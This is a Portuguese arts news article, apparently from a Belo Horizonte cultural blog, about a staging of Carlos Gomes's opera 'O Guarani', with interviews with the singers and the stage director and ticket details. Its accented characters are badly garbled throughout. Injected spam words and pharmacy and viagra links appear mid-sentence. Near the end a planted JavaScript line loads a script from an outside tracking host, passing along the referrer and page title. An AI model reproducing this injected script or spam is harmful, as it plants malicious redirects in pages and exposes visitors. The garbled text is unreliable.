Minas GeraisÓperaProgramação

“O Guarani” ganha nova montagem em BH

HeroA�smo, traiA�A?o e redenA�A?o fazem parte da histA?ria do A�ndio Peri e da filha de portugueses Ceci. online Order


Chega aos palcos a A?pera O Guarani, de Carlos Gomes (1836-1896). Inspirada em romance homA?nimo de JosA� de Alencar (1829-1877), A� considerada um marco da cultura brasileira, tanto pela importA?ncia do escritor como do compositor para a cultura nacional. A trama, ambientadaA�no Brasil do sA�culo 16, onde os A�ndios aimorA�s e guaranis estA?o em guerra, A� atravessada por atos de heroA�smo, traiA�A�es e redenA�A�es. A montagem, que fica em cartaz de quinta-feira (10) ao dia 20 (em dias intercalados), no PalA?cio das Artes, em Belo Horizonte, conta com a Orquestra SinfA?nica e Coral Lirico de Minas Gerais, sob a regA?ncia do maestro SA�lvio Viegas e com direA�A?o cA?nica de Walter Neiva.

O Guarani coloca no palco um dos casais romA?nticos mais famosos do imaginA?rio do Brasil: o A�ndio Peri (Richard Bauer) e a filha de portugueses Ceci (Marina Considera). E o amor dela por ele, jA? que, para os cantores, a iniciativa da a�?paqueraa�? foi de Ceci. a�?A� um amor difA�cil que, na peA�a, se faz possA�vel. Ceci A� uma menina que se descobre uma mulher corajosaa�?, observa Marina, suspeitando que Ceci viu em Peri um homem bonito e corajoso. a�?A beleza de Ceci, diferente para um A�ndio, atrai Peri. Existe atraA�A?o fA�sica e eles se apaixonam. SA� A� amor, nA?o seia�?, pondera Richard. A relaA�A?o tem significado simbA?lico: a�?A� uma metA?fora do que seria o inA�cio da cultura brasileira. Somos, apesar de todos os preconceitos, uma mistura de muitas etniasa�?, recorda Marina.

a�?HA? uma dimensA?o heroica, no sentido romA?ntico, nesta paixA?oa�?, observa Richard. O cantor explica que a peA�a tem como tema uma consideraA�A?o sobre o amor (o platA?nico, o fA�sico e o cristA?o), posta a serviA�o de um olhar sobre dramas humanos que fazem parte das grandes obras do perA�odo. Richard recorda ainda que a permanA?ncia do casal no imaginA?rio brasileiro deve-se ao fato de que, atA� a primeira metade do sA�culo 20, a A?pera era um gA?nero popular. Tanto que Ceci e Peri sA?o evocados na marchinha de sucesso Touradas em Madri Buy , de Braguinha. a�?A� um casal icA?nico da arte brasileiraa�?, brinca o cantor, acrescentando que se trata da peA�a mais famosa de Carlos Gomes, a�?o A?nico compositor das AmA�ricas de A?pera italianaa�?, que fez sucesso inclusive no exterior.

 

Marina Considera estA? fazendo O Guarani pela primeira vez. a�?Estou adorando. A� um tema nosso, um compositor nosso. Interpretar uma peA�a assim dA? um orgulho nacionala�?, explica, dizendo que sempre quis cantar Carlos Gomes. Richard Bauer estA? interpretando Peri pela segunda vez. Ambos os cantores destacam a beleza das melodias, a�?que ficam na cabeA�a do ouvintea�?. a�?A� uma mA?sica incrA�vel, extremamente criativa, uma A?pera que exige muito do intA�rprete, com vozes maleA?veis e densidade da orquestraa�?, conta Marina. a�?O Guarani online nA?o exige sA? voz, mas inflexA�esa�?, observa Richard. a�?Fazer uma obra de Carlos Gomes, para mim, A� sempre uma emoA�A?o grande. Sou entusiasta da obra de Carlos Gomesa�?, diz Richard.

O intA�rprete recorda que todos os grandes cantores jA? encenaram peA�as de Carlos Gomes. E defende a criaA�A?o de um Festival Carlos Gomes, nos moldes dos que existem para Wagner, na Alemanha, e para Verdi, na ItA?lia. a�?Conhecer a obra de Carlos Gomes A� dever quase cA�vico do brasileiroa�?, afirma, lembrando que, em 2016, sA?o celebrados os 180 anos de nascimento e os 120 de morte do compositor.

 

Sonhos

a�?A�pera leva o pA?blico ao mundo dos sonhos e. quanto mais ela conseguir isso, melhora�?, garante Walter Neiva, o diretor cA?nico da montagem de O Guarani online . a�?Nossa encenaA�A?o valoriza a mA?sica. Quem nA?o conhece a mA?sica de Carlos Gomes vai se surpreendera�?, garante. a�?Em meio A� sonoridade italiana, podemos ouvir serestas, serenatas e atA� um certo sotaque caipira do brasilidade http://coachingplus.dk/order-toradol/ a�?, conta. Ele avisa que nA?o se trata de uma montagem realista: a�?O importante desta montagem A� apresentar Carlos Gomes, autor que ainda hoje tem o seu valor pouco reconhecidoa�?.

Neiva conta que Carlos Gomes foi campineiro humilde, vocacionado para a mA?sicaA�que, com apoio de dom Pedro II, estudou na ItA?lia e fez sucesso no (Teatro) Scala, de MilA?o (ItA?lia). Endividado, o compositor voltou doente para o Brasil e, com a queda da monarquia, ficou desamparado. Por ocasiA?o da ProclamaA�A?o da RepA?blica, Marechal Deodoro convidou Carlos Gomes para compor o hino nacional, mas ele recusou, pois considerava traiA�A?o a seu patrono, dom Pedro II. O compositor termina seus dias como professor do ConservatA?rio de BelA�m, no ParA?, a convite do governador.

Durante o perA�odo que viveu em terras italianas, o brasileiro ganhou reverA?ncia de seus contemporA?neos. Puccini (1858-1924) levou uma A?pera sua para Carlos Gomes analisar. Diz a lenda que, diante das peA�as do brasileiro, Verdi (1813-1901) teria dito: a�?Este jovem comeA�a onde eu terminoa�?. Pietro Mascagni (1863-1945), autor de Cavalleria Rusticana, em visita ao Brasil no inA�cio do sA�culo 20, foi convidado para inaugurar um monumento em homenagem a Carlos Gomes. Ao descerrar o pano que cobria a peA�a, o italiano nA?o reconheceu a face do brasileiro. Autoridades tinham confundido, apA?s a morte do escultor, a cabeA�a do general Pinheiro Machado com a do compositor.

a�?Carlos Gomes merecia ser mais encenado e nA?o sA? nas efemA�rides. EstA? na hora de tirar as partituras dele da estante e tocara�?, defende Walter Neiva. Para o diretor, tocar as obras do compositor A� o modo mais eficaz de combater o esquecimento dele no Brasil. Walter defende, inclusive, que essa aA�A?o A� essencial para motivar os intA�rpretes a estudarem mais a mA?sica de Carlos Gomes. a�?Por que um cantor vai estudar um compositor que Cheap cobra muita dedicaA�A?o quando sabe que vai fazer a peA�a uma vez sA??a�?, indaga. a�?Existe um descaso com a obra de Carlos Gomes no Brasil selling viagra birmingham a�?, critica.

 

SERVIA�O:

 

“O Guarani”, A?pera de Carlos Gomes

 

Orquestra SinfA?nica e Coral Lirico de Minas Gerais

SA�lvio Viegas, regA?ncia

Walter Neiva, direA�A?o cA?nica

 

10, 12, 14, 16 e 18 de novembro, A�s 20h; 21 de novembro, A�s 19h

Grande Teatro do PalA?cio das Artes (Av. Afonso Pena 1.537, Centro – Belo Horizonte. Tel.: 31 3236-7400)

 

Ingressos: R$ 60, com meia-entrada para estudantes e pessoas com mais de 60 anos

 

SugestA?o etA?ria: 10 anos

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.